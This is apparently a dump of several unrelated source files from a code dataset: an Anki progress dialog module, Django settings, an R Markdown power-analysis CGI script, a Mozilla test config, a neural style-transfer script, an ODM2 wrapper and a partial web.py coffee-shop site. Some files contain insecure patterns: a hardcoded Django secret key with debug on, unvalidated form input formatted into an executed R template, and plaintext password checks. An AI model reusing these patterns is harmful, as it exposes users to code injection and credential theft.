simgunz/anki | qt/aqt/progress.py | 1 | 7938 | # Copyright: Ankitects Pty Ltd and contributors
# License: GNU AGPL, version 3 or later; http://www.gnu.org/licenses/agpl.html
from __future__ import annotations
import time
from typing import Callable, Optional
import aqt.forms
from aqt.qt import *
from aqt.utils import TR, disable_help_button, tr
# Progress info
##########################################################################
class ProgressManager:
def __init__(self, mw: aqt.AnkiQt) -> None:
self.mw = mw
self.app = QApplication.instance()
self.inDB = False
self.blockUpdates = False
self._show_timer: Optional[QTimer] = None
self._win: Optional[ProgressDialog] = None
self._levels = 0
# Safer timers
##########################################################################
# A custom timer which avoids firing while a progress dialog is active
# (likely due to some long-running DB operation)
def timer(
self, ms: int, func: Callable, repeat: bool, requiresCollection: bool = True
) -> QTimer:
"""Create and start a standard Anki timer.
If the timer fires while a progress window is shown:
- if it is a repeating timer, it will wait the same delay again
- if it is non-repeating, it will try again in 100ms
If requiresCollection is True, the timer will not fire if the
collection has been unloaded. Setting it to False will allow the
timer to fire even when there is no collection, but will still
only fire when there is no current progress dialog."""
def handler() -> None:
if requiresCollection and not self.mw.col:
# no current collection; timer is no longer valid
print(f"Ignored progress func as collection unloaded: {repr(func)}")
return
if not self._levels:
# no current progress; safe to fire
func()
else:
if repeat:
# skip this time; we'll fire again
pass
else:
# retry in 100ms
self.timer(100, func, False, requiresCollection)
t = QTimer(self.mw)
if not repeat:
t.setSingleShot(True)
qconnect(t.timeout, handler)
t.start(ms)
return t
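# Usage sketch (assuming the manager is reachable as mw.progress, as elsewhere in aqt;
# refresh_stats is an illustrative callback, not something defined in this module):
#   self._stats_timer = mw.progress.timer(30000, refresh_stats, repeat=True)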
# Creating progress dialogs
##########################################################################
def start(
self,
max: int = 0,
min: int = 0,
label: Optional[str] = None,
parent: Optional[QDialog] = None,
immediate: bool = False,
) -> Optional[ProgressDialog]:
self._levels += 1
if self._levels > 1:
return None
# setup window
parent = parent or self.app.activeWindow()
if not parent and self.mw.isVisible():
parent = self.mw
label = label or tr(TR.QT_MISC_PROCESSING)
self._win = ProgressDialog(parent)
self._win.form.progressBar.setMinimum(min)
self._win.form.progressBar.setMaximum(max)
self._win.form.progressBar.setTextVisible(False)
self._win.form.label.setText(label)
self._win.setWindowTitle("Anki")
self._win.setWindowModality(Qt.ApplicationModal)
self._win.setMinimumWidth(300)
self._setBusy()
self._shown: float = 0
self._counter = min
self._min = min
self._max = max
self._firstTime = time.time()
self._lastUpdate = time.time()
self._updating = False
self._show_timer = QTimer(self.mw)
self._show_timer.setSingleShot(True)
self._show_timer.start(immediate and 100 or 600)
qconnect(self._show_timer.timeout, self._on_show_timer)
return self._win
def update(
self,
label: Optional[str] = None,
value: Optional[int] = None,
process: bool = True,
maybeShow: bool = True,
max: Optional[int] = None,
) -> None:
# print self._min, self._counter, self._max, label, time.time() - self._lastTime
if not self.mw.inMainThread():
print("progress.update() called on wrong thread")
return
if self._updating:
return
if maybeShow:
self._maybeShow()
if not self._shown:
return
elapsed = time.time() - self._lastUpdate
if label:
self._win.form.label.setText(label)
self._max = max or 0
self._win.form.progressBar.setMaximum(self._max)
if self._max:
self._counter = value or (self._counter + 1)
self._win.form.progressBar.setValue(self._counter)
if process and elapsed >= 0.2:
self._updating = True
self.app.processEvents() # type: ignore #possibly related to https://github.com/python/mypy/issues/6910
self._updating = False
self._lastUpdate = time.time()
def finish(self) -> None:
self._levels -= 1
self._levels = max(0, self._levels)
if self._levels == 0:
if self._win:
self._closeWin()
self._unsetBusy()
if self._show_timer:
self._show_timer.stop()
self._show_timer = None
def clear(self) -> None:
"Restore the interface after an error."
if self._levels:
self._levels = 1
self.finish()
def _maybeShow(self) -> None:
if not self._levels:
return
if self._shown:
return
delta = time.time() - self._firstTime
if delta > 0.5:
self._showWin()
def _showWin(self) -> None:
self._shown = time.time()
self._win.show()
def _closeWin(self) -> None:
if self._shown:
while True:
# give the window system a second to present
# window before we close it again - fixes
# progress window getting stuck, especially
# on ubuntu 16.10+
elap = time.time() - self._shown
if elap >= 0.5:
break
self.app.processEvents(QEventLoop.ExcludeUserInputEvents) # type: ignore #possibly related to https://github.com/python/mypy/issues/6910
self._win.cancel()
self._win = None
self._shown = 0
def _setBusy(self) -> None:
self.mw.app.setOverrideCursor(QCursor(Qt.WaitCursor))
def _unsetBusy(self) -> None:
self.app.restoreOverrideCursor()
def busy(self) -> int:
"True if processing."
return self._levels
def _on_show_timer(self) -> None:
self._show_timer = None
self._showWin()
def want_cancel(self) -> bool:
win = self._win
if win:
return win.wantCancel
else:
return False
def set_title(self, title: str) -> None:
win = self._win
if win:
win.setWindowTitle(title)
class ProgressDialog(QDialog):
def __init__(self, parent: QWidget) -> None:
QDialog.__init__(self, parent)
disable_help_button(self)
self.form = aqt.forms.progress.Ui_Dialog()
self.form.setupUi(self)
self._closingDown = False
self.wantCancel = False
# required for smooth progress bars
self.form.progressBar.setStyleSheet("QProgressBar::chunk { width: 1px; }")
def cancel(self) -> None:
self._closingDown = True
self.hide()
def closeEvent(self, evt: QCloseEvent) -> None:
if self._closingDown:
evt.accept()
else:
self.wantCancel = True
evt.ignore()
def keyPressEvent(self, evt: QKeyEvent) -> None:
if evt.key() == Qt.Key_Escape:
evt.ignore()
self.wantCancel = True
| agpl-3.0 | -4,262,308,446,230,237,000 | 31.801653 | 153 | 0.546485 | false |
halftk/OpenShareNow | OpenShareNow/OpenShareNow/settings.py | 1 | 2380 | """
Django settings for OpenShareNow project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import os.path
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'etlrhar2t*+sbit%hoibvxftrvy%#6%)&9#x6@p()94cqr%i-v'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(os.path.dirname(__file__),'../osnow/templates'),
)
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'osnow',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'OpenShareNow.urls'
WSGI_APPLICATION = 'OpenShareNow.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'basededades.db',
'USER': '',
'PASSWORD': '',
#'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
| gpl-2.0 | -430,860,475,850,630,200 | 24.319149 | 85 | 0.714286 | false |
s-andrews/powerguide | www/powerguide.py | 1 | 3812 | import tempfile
import os
import shutil
import subprocess
import shlex
import cgi
import sys
# For development only
import cgitb
cgitb.enable()
# Set some global preferences
template_dir = os.path.dirname(os.path.realpath(__file__))+"/../R/"
pandoc_location = "/usr/lib/rstudio/bin/pandoc"
path = "/usr/bin:/bin"
# Set some environment variables which will otherwise cause things
# to complain
os.environ["HOME"] = template_dir
os.environ["PATH"] = path
def run_analysis (template,variables):
# Make a temporary directory, copy the template to it
# applying the substitutions we need, run the template
# and then send the output back on STDOUT
# Find the template
template_text = ""
with open(template) as file:
template_text = file.read()
# Create a temporary working space
tempDir = tempfile.TemporaryDirectory()
# Write the template to this directory
with open(tempDir.name+"/script.Rmd","w") as file:
file.write(template_text.format(**variables))
# Copy over all of the png files from the template directory
for file in os.listdir(template_dir):
if file[-4:] == ".png":
shutil.copyfile(template_dir+"/"+file,tempDir.name+"/"+file)
# Run the render command
subprocess.call(shlex.split("Rscript -e 'Sys.setenv(RSTUDIO_PANDOC=\"{pandoc}\") ; rmarkdown::render(\"{dir}/script.Rmd\", quiet=TRUE, output_file=\"{dir}/output.html\")'".format(pandoc=pandoc_location,dir=tempDir.name)))
# Read and output the HTML
sys.stdout.buffer.write(b"Content-Type: text/html\n\n")
with open(tempDir.name+"/output.html","rb") as file:
sys.stdout.buffer.write(file.read())
# Clean up
tempDir.cleanup()
if (__name__ == "__main__"):
# Read in the options from the web server
options = cgi.FieldStorage()
# We need to figure out what template we're going to use,
# and what options we need to pass on to the template to
# generate the correct report.
if options["type"].value == "Continuous" and options["groups"].value == "2" and options["normal"].value == "Yes":
template = template_dir+"2_sample_continuous.Rmd"
field_values = {"power": options["power"].value,"significance": options["significance"].value, "difference": options["effect_size"].value, "variance": options["variance"].value}
run_analysis(template,field_values)
elif options["type"].value == "Continuous" and options["groups"].value == "1" and options["normal"].value == "Yes":
template = template_dir+"1_sample_continuous.Rmd"
field_values = {"power": options["power"].value,"significance": options["significance"].value, "difference": options["effect_size"].value, "variance": options["variance"].value}
run_analysis(template,field_values)
elif options["type"].value == "Continuous" and options["groups"].value[:1] == "3" and options["normal"].value == "Yes":
template = template_dir+"3_sample_continuous.Rmd"
field_values = {"group_number": options["group_number"].value, "variance_between":options["variance_between"].value, "power": options["power"].value,"significance": options["significance"].value, "difference": options["effect_size"].value, "variance": options["variance"].value}
run_analysis(template,field_values)
elif options["type"].value == "Categorical" and options["groups"].value == "2" :
template = template_dir+"2_sample_categorical.Rmd"
field_values = {"power": options["power"].value,"significance": options["significance"].value, "start_proportion": options["start_proportion"].value, "end_proportion": options["end_proportion"].value}
run_analysis(template,field_values)
else:
print ("Content-type: text/plain\n")
print ("Not supported yet...")
print(options["type"].value)
# template = template_dir+"2_sample_continuous.Rmd"
# run_analysis(template,{"power":0.8,"significance":0.05,"difference":10,"variance":5})
| gpl-3.0 | 4,918,219,642,766,401,000 | 31.305085 | 280 | 0.706978 | false |
Yukarumya/Yukarum-Redfoxes | testing/mozharness/configs/marionette/windows_config.py | 1 | 1876 | # This is a template config file for marionette production on Windows.
import os
import sys
config = {
# marionette options
"marionette_address": "localhost:2828",
"test_manifest": "unit-tests.ini",
"virtualenv_python_dll": 'c:/mozilla-build/python27/python27.dll',
"virtualenv_path": 'venv',
"exes": {
'python': 'c:/mozilla-build/python27/python',
'virtualenv': ['c:/mozilla-build/python27/python', 'c:/mozilla-build/buildbotve/virtualenv.py'],
'hg': 'c:/mozilla-build/hg/hg',
'mozinstall': ['%s/build/venv/scripts/python' % os.getcwd(),
'%s/build/venv/scripts/mozinstall-script.py' % os.getcwd()],
'tooltool.py': [sys.executable, 'C:/mozilla-build/tooltool.py'],
},
"find_links": [
"http://pypi.pvt.build.mozilla.org/pub",
"http://pypi.pub.build.mozilla.org/pub",
],
"pip_index": False,
"buildbot_json_path": "buildprops.json",
"default_actions": [
'clobber',
'read-buildbot-config',
'download-and-extract',
'create-virtualenv',
'install',
'run-tests',
],
"default_blob_upload_servers": [
"https://blobupload.elasticbeanstalk.com",
],
"blob_uploader_auth_file" : os.path.join(os.getcwd(), "oauth.txt"),
"download_minidump_stackwalk": True,
"download_symbols": "ondemand",
"suite_definitions": {
"marionette_desktop": {
"options": [
"-vv",
"--log-raw=%(raw_log_file)s",
"--log-errorsummary=%(error_summary_file)s",
"--log-html=%(html_report_file)s",
"--binary=%(binary)s",
"--address=%(address)s",
"--symbols-path=%(symbols_path)s"
],
"run_filename": "",
"testsdir": ""
},
},
}
| mpl-2.0 | -4,901,755,299,401,112,000 | 31.344828 | 104 | 0.541045 | false |
EnthyrosVanAkel/neural_artistic_style | neural_artistic_style.py | 1 | 3686 | #!/usr/bin/env python
import os
import argparse
import numpy as np
import scipy.misc
import deeppy as dp
from matconvnet import vgg19_net
from style_network import StyleNetwork
def weight_tuple(s):
try:
conv_idx, weight = map(int, s.split(','))
return conv_idx, weight
except:
raise argparse.ArgumentTypeError('weights must by "conv_idx,weight"')
def weight_array(weights):
array = np.zeros(19)
for idx, weight in weights:
array[idx] = weight
norm = np.sum(array)
if norm > 0:
array /= norm
return array
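# Example of the weight plumbing above (values are illustrative): a CLI option such as
# --style-weights 0,1 2,1 is parsed by weight_tuple into [(0, 1), (2, 1)], and
# weight_array([(0, 1), (2, 1)]) returns a length-19 vector with 0.5 at indices 0 and 2,
# since the weights are normalised to sum to 1.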
def imread(path):
return scipy.misc.imread(path).astype(dp.float_)
def imsave(path, img):
img = np.clip(img, 0, 255).astype(np.uint8)
return scipy.misc.imsave(path, img)
def to_bc01(img):
return np.transpose(img, (2, 0, 1))[np.newaxis, ...]
def to_rgb(img):
return np.transpose(img[0], (1, 2, 0))
def run():
parser = argparse.ArgumentParser(
description='Neural artistic style.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--subject', required=True, type=str,
help='subject image')
parser.add_argument('--style', required=True, type=str,
help='style image')
parser.add_argument('--output', default='out.png', type=str,
help='output image')
parser.add_argument('--animation', default='animation', type=str,
help='output animation directory')
parser.add_argument('--iterations', default=500, type=int,
help='Number of iterations')
parser.add_argument('--learn-rate', default=5.0, type=float,
help='Learning rate')
parser.add_argument('--subject-weights', nargs='*', type=weight_tuple,
default=[(9, 1)],
help='list of subject weights (conv_idx,weight)')
parser.add_argument('--style-weights', nargs='*', type=weight_tuple,
default=[(0, 1), (2, 1), (4, 1), (8, 1), (12, 1)],
help='list of style weights (conv_idx,weight)')
parser.add_argument('--subject-ratio', type=float, default=2e-2,
help='weight of subject relative to style')
parser.add_argument('--vgg19', default='imagenet-vgg-verydeep-19.mat',
type=str, help='VGG-19 .mat file')
args = parser.parse_args()
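# Example invocation (file names are illustrative):
#   python neural_artistic_style.py --subject images/portrait.jpg --style images/starry_night.jpg \
#       --output out.png --iterations 300 --subject-ratio 2e-2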
layers, img_mean = vgg19_net(args.vgg19, pool_method='avg')
# Inputs
pixel_mean = np.mean(img_mean, axis=(0, 1))
style_img = imread(args.style)
subject_img = imread(args.subject)
style_img -= pixel_mean
subject_img -= pixel_mean
# Setup network
subject_weights = weight_array(args.subject_weights) * args.subject_ratio
style_weights = weight_array(args.style_weights)
net = StyleNetwork(layers, to_bc01(subject_img), to_bc01(style_img),
subject_weights, style_weights)
# Repaint image
def net_img():
return to_rgb(net.image) + pixel_mean
if not os.path.exists(args.animation):
os.mkdir(args.animation)
params = net._params
learn_rule = dp.Adam(learn_rate=args.learn_rate)
learn_rule_states = [learn_rule.init_state(p) for p in params]
for i in range(args.iterations):
imsave(os.path.join(args.animation, '%.4d.png' % i), net_img())
cost = np.mean(net._update())
for param, state in zip(params, learn_rule_states):
learn_rule.step(param, state)
print('Iteration: %i, cost: %.4f' % (i, cost))
imsave(args.output, net_img())
if __name__ == "__main__":
run()
| mit | -5,447,275,127,889,458,000 | 31.910714 | 77 | 0.597938 | false |
Castronova/EMIT | wrappers/odm2_data.py | 1 | 6423 | __author__ = 'tonycastronova'
import datetime as dt
from api_old.ODM2.Core.services import readCore
from api_old.ODM2.Results.services import readResults
# from shapely import wkb
import stdlib, uuid
from utilities.status import Status
import datatypes
from utilities import geometry
class odm2(object):
def __init__(self,resultid, session):
# get result object and result timeseries
core = readCore(session)
obj = core.getResultByID(resultID=int(resultid))
readres = readResults(session)
results = readres.getTimeSeriesValuesByResultId(resultId=int(resultid))
# separate the date and value pairs in the timeseries
dates = [date.ValueDateTime for date in results]
values = [val.DataValue for val in results]
# basic exchange item info
id = uuid.uuid4().hex[:8]
name = obj.VariableObj.VariableCode
desc = obj.VariableObj.VariableDefinition
#unit = obj.UnitObj.UnitsName
#vari = obj.VariableObj.VariableNameCV
type = stdlib.ExchangeItemType.OUTPUT
start = min(dates)
end = max(dates)
# build variable
variable = stdlib.Variable()
variable.VariableDefinition(obj.VariableObj.VariableDefinition)
variable.VariableNameCV(obj.VariableObj.VariableNameCV)
# build unit
unit = stdlib.Unit()
unit.UnitAbbreviation(obj.UnitObj.UnitsAbbreviation)
unit.UnitName(obj.UnitObj.UnitsName)
unit.UnitTypeCV(obj.UnitObj.UnitsTypeCV)
# build geometries
# todo: need to specify srs and elevation
wkb = str(obj.FeatureActionObj.SamplingFeatureObj.FeatureGeometry.data)
geom = geometry.fromWKB(wkb)
# build exchange item object
oei = stdlib.ExchangeItem(id=id,
name=name,
desc=desc,
geometry=geom,
unit=unit,
variable=variable,type=type )
# set global parameters
self.__id = id
self.__name = name
self.__start=start
self.__end=end
self.__output={self.__name: oei}
self.__desc=obj.VariableObj.VariableDefinition
self.__current_time = self.simulation_start()
self.__obj = obj
self.__resultid = obj.ResultID
self.__session = session
self.__status = Status.Loaded
def type(self):
return datatypes.ModelTypes.Data
def save(self):
#return [self.get_output_by_name(outputname=self.name())]
#return [self.__output]
return []
def run(self,inputs):
# set the status to finished
self.status(Status.Finished)
def run_timestep(self,inputs,time):
# set the status to finished
self.status(Status.Finished)
def prepare(self):
'''
Called before simulation run to prepare the model
:return: READY status
'''
# query the database
#return [self.get_output_by_name(outputname=self.name())]
self.status(Status.Ready)
def session(self):
return self.__session
def obj(self):
return self.__obj
#
# def actionid(self):
# return self.__actionid
def resultid(self):
return self.__resultid
def id(self):
return self.__id
def time_step(self):
"""
ini configuration file
"""
#return (int(self.__params['time_step'][0]['value']),self.__params['time_step'][0]['unit_type_cv'])
raise NotImplementedError('This is an abstract method that must be implemented!')
def outputs(self):
"""
ini configuration file
"""
return self.__output
def inputs(self):
return {}
def simulation_start(self):
return self.__start
def simulation_end(self):
return self.__end
def name(self):
return self.__name
def description(self):
return self.__desc
def current_time(self):
return self.__current_time
def increment_time(self, time):
value,unit = self.time_step()
# if unit == 'millisecond': self.__current_time += dt.timedelta(milliseconds=value)
# elif unit == 'second': self.__current_time += dt.timedelta(seconds =value)
# elif unit == 'minute': self.__current_time += dt.timedelta(minutes=value)
# elif unit == 'hour': self.__current_time += dt.timedelta(hours=value)
# elif unit == 'day': self.__current_time += dt.timedelta(days=value)
# else:
# raise Exception('Unknown unit: %s'%unit)
if unit == 'millisecond': time += dt.timedelta(milliseconds=value)
elif unit == 'second': time += dt.timedelta(seconds =value)
elif unit == 'minute': time += dt.timedelta(minutes=value)
elif unit == 'hour': time += dt.timedelta(hours=value)
elif unit == 'day': time += dt.timedelta(days=value)
else:
raise Exception('Unknown unit: %s'%unit)
return time
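# Worked example (hypothetical, for a subclass whose time_step() returns (15, 'minute')):
#   increment_time(dt.datetime(2014, 1, 1))  ->  datetime.datetime(2014, 1, 1, 0, 15)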
def get_output_by_name(self,outputname):
outputs = self.outputs()
if outputs.has_key(outputname):
return outputs[outputname]
else:
print 'Could not find output: %s' % outputname
return None
#return [self.__output]
#
# outputs = self.outputs()
#
# for output in outputs:
# if output.name() == outputname:
# return output
#
# raise Exception('Could not find output: %s' + outputname)
#raise NotImplementedError('This is an abstract method that must be implemented!')
def set_geom_values(self,variablename,geometry,datavalues):
#
# item = self.get_output_by_name(variablename)
#
# geometries = item.geometries()
# for geom in geometries:
# if geom.geom().equals(geometry):
# geom.datavalues().set_timeseries(datavalues)
# return
# raise Exception ('Error setting data for variable: %s' % variablename)
raise NotImplementedError('This is an abstract method that must be implemented!')
def status(self, value=None):
if value is not None:
self.__status = value
return self.__status | gpl-2.0 | 4,727,562,517,179,709,000 | 29.590476 | 107 | 0.589288 | false |
torresj/practica-3 | Código/tiposCafes.py | 1 | 18836 | # -*- coding: utf-8 -*-
# This file belongs to the application "practica 3", licensed under GPLv2.
# Copyright (C) 2014 Jaime Torres Benavente.
#
# This program is free software; you can redistribute it and/or modify it under the terms
# of the GNU General Public License as published by the Free Software Foundation, either
# version 2 of the License or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY,
# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program;
# if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
"""
Created on Wed Oct 30 12:07:52 2013
@author: jaime
"""
import web
from web.contrib.template import render_mako
from web import form
import pymongo
import feedparser
import time
render = render_mako(
directories=['plantillas'],
input_encoding='utf-8',
output_encoding='utf-8',
)
'''
Esta funcion sirve para actualizar el tiempo del ultimo
acceso al rss, si fuera necesario. Comprobara si han pasado
mas de 10 minutos desde la ultima vez, y si es asi, volverá
a descargar el rss
'''
def actualiza_tiempo():
global rss
conn=pymongo.MongoClient()
db=conn.mydb
cache=db.cache
tiempo1=time.time()
t=cache.find_one({"rss":"el pais"})
tiempo2=t[u'ult_act']
if((tiempo1-tiempo2)>600):
cache.update({"rss": "el pais"}, {"$set": {"ult_act": time.time()}})
rss=feedparser.parse('http://ep00.epimg.net/rss/tags/ultimas_noticias.xml')
conn.close()
#Variable para RSS, también almacenamos el momento en que se descargo el rss
rss=feedparser.parse('http://ep00.epimg.net/rss/tags/ultimas_noticias.xml')
actualiza_tiempo()
#Validadores
vpass=form.regexp(r'.{7,20}$',"La contrasenia debe tener mas de 7 caracteres")
#Formulario Para el login
formul = form.Form(
form.Textbox("user",form.notnull,description = "Usuario:"),
form.Password("password",form.notnull,vpass,description = "Contraseña:"),
form.Button("Login")
)
#Clases para manejar las paginas de los tipos de cafes
class Cafe1:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion detallada del cafe 1"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
modo="index"
error=''
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion del cafe 1"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
#buscamos al usuario en la base de datos
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
error='contraseña errónea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe2:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 2"
cuerpo="Descripcion detallada del cafe 2"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 2"
cuerpo="Descripcion del cafe 2"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
			#look up the user in the database
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
					error='contraseña erronea'
			except TypeError:
				log=False
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe3:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
		#Variables used to populate the web page
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion detallada del cafe 3"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 3"
cuerpo="Descripcion del cafe 3"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
			#look up the user in the database
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
